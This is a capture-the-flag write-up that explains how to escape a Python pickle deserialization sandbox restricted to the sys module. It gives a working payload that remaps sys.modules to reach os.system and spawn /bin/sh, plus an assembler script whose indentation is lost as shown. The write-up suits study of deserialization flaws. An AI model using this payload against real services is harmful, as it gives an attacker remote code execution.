Rating:

# Pyshv1 : high security pickles.

## The challenge

The sever expects a base64 encoded pickle object. The one twist : You are limited in what
you can put in the pickle. The only module you can use in the pickle is `sys`

This means the typical pickle shellcode won't work :
```
cos
system
(S'/bin/sh'
tR.
```
It's using os. This is not gonna work. We'll have to build our own damned shellcode

## What pickle allows.

The pickle format(s) is a stack based language made to store python objects. With it, you can :

* create tuples, lists, dicts
* add values to lists and tuples
* add or update values in dict
* access functions and values at the root of modules
* call whatever you manage to put on the stack.

With the limitation of the challenge, getting anything but the function at the root of sys on the stack is non trivial.

## Python system module.

There are a lot of thing in the sys module. I spent some time investigating the `sys.breakpointhook()` method, as it pops the debugger. However, it wouldn't work on the server.

While the `sys` module has `sys.stdout`, it can't be used to print, as only object and function at the root of the module can be accessed or called. You can read `sys.argv`, or call `sys.exit()`, but `sys.stdout.write()` is off limit. Printing can be done via `sys.displayhook`.

A key element of the `sys` module is the `sys.modules` dictionary. It contains references to all loaded modules, and playing with it has a lot of impact.

## Solving this

The aim is to reach `os.system` to spawn a shell.
To solve this, we're gonna change the value of `sys.modules['sys']` to change what `sys` represent.

It's a three step process, best described by the following python code.

```
import sys
import os

modules = sys.modules # save sys.modules for later
sys.modules['sys'] = sys.modules # remap sys to sys.modules
import sys
modules['sys'] = sys.get('os') # access os throug the remapped sys, and store it in sys.modules['sys']
import sys
sys.system('echo "it works!"') # boom!
```

This is great and all, but translating that to pickle code will require a deep understanding of the pickle language and opcodes.

## The Solution

writing the solution by hand is a nasty business. the shellcode looks like this :

```
csys
displayhook
p0
0csys
modules
p1
0g1
S'sys'
g1
scsys
get
p2
0g2
(S'os'
tRp3
0g1
S'sys'
g3
s0csys
system
(S'/bin/sh'
tR0.
```

Dissassembled with the excellent pickletools module (it's in the standard lib!), it's a bit better looking :
```
0: c GLOBAL 'sys displayhook'
17: p PUT 0
20: 0 POP
21: c GLOBAL 'sys modules'
34: p PUT 1
37: 0 POP
38: g GET 1
41: S STRING 'sys'
48: g GET 1
51: s SETITEM
52: c GLOBAL 'sys get'
61: p PUT 2
64: 0 POP
65: g GET 2
68: ( MARK
69: S STRING 'os'
75: t TUPLE (MARK at 68)
76: R REDUCE
77: p PUT 3
80: 0 POP
81: g GET 1
84: S STRING 'sys'
91: g GET 3
94: s SETITEM
95: 0 POP
96: c GLOBAL 'sys system'
108: ( MARK
109: S STRING '/bin/sh'
120: t TUPLE (MARK at 108)
121: R REDUCE
122: 0 POP
123: . STOP
highest protocol among opcodes = 0
```

But this is still not great, and anyway there's no assembler available in the pickletools module.

I wrote a small assembler, implementing just the opcode that were needed for this series of challenge.

Here it is :

```python
#!/usr/bin/env python3

from pickle import * # this imports the constants for all the pickle opcodes
from pickletools import dis # thank god for the pickletools module

from base64 import b64encode

def main():
p = BadPickler(protocol=0)

# ==== Shellcode =====================================
l = [
# access `sys.modules`, and save it on the memo
p.store_global('sys', 'modules', 'modules'),

# grab `sys.modules` from the memo, put it on the stack
p.load('modules'),

# sys.modules['sys'] = sys.modules
p.update_key(p.string('sys'),
p.load('modules')),

# at this point, `sys` is no longer pointing to the `sys` module.
# It is now a reference to the original `sys.modules`
# this means we can call any dict method on `sys`, to grab values of keys
# in the original sys.module.

#grab a reference to the real `sys.modules.get`
p.store_global('sys', 'get', 'dict_get'),

# call the real `sys.modules.get('os')` to get a reference to
# the os module
p.call(p.load('dict_get'),
p.string('os')),

# store the os module
p.store('os_module'),
POP,

# load `sys.modules`
p.load('modules'),

# set `sys.modules['sys'] = <module 'os' from '/usr/lib/python3.7/os.py'>
p.update_key(p.string('sys'),
p.load('os_module')),
POP,

# at this point, `sys` is now a reference to the `os` module.
# we can access the `os.system` function, popping a shell
p.call(p.get_global('sys', 'system'),
p.string('/bin/sh')),
POP,
STOP
]
p.write_list(l)
bad_pickle = p.get_pickle()

dis(bad_pickle)
print(b64encode(bad_pickle))

class BadPickler():
memo_mapping = {}
memo_idx = 0
def __init__(self, protocol):
self.pickle_buff = bytearray()
self.protocol = protocol

def write(self, x):
self.pickle_buff += x

def write_list (self, list_x):
for x in list_x:
self.pickle_buff += x

def build(self, *opcodes):
return b''.join(opcodes)

def get_pickle(self):
return(self.pickle_buff)

# ----------------------------------------------

def get_global(self, mod, cls):
b_mod = mod.encode('ascii')
b_cls = cls.encode('ascii')
return self.build(GLOBAL, b_mod, b'\n', b_cls, b'\n')

def call(self, fn, args):
return self.build(fn,
MARK,
self.build(args),
TUPLE,
REDUCE)
def store(self, name):
byte_memo_idx = str(self.memo_idx).encode('ascii')
self.memo_mapping[name] = byte_memo_idx
val = self.build(PUT, byte_memo_idx, b'\n')
self.memo_idx += 1
return val

def store_global(self, mod, cls, name):
return self.build(self.get_global(mod,cls),
self.store(name),
POP)

def load(self, name):
idx = self.memo_mapping[name]
return self.build(GET, idx, b'\n')

def string(self, x):
return self.build(b"S'", x.encode('ascii'), b"'", b'\n')

def update_key(self, key, val):
return self.build(key,
val,
SETITEM)

if __name__ == '__main__':
main()
```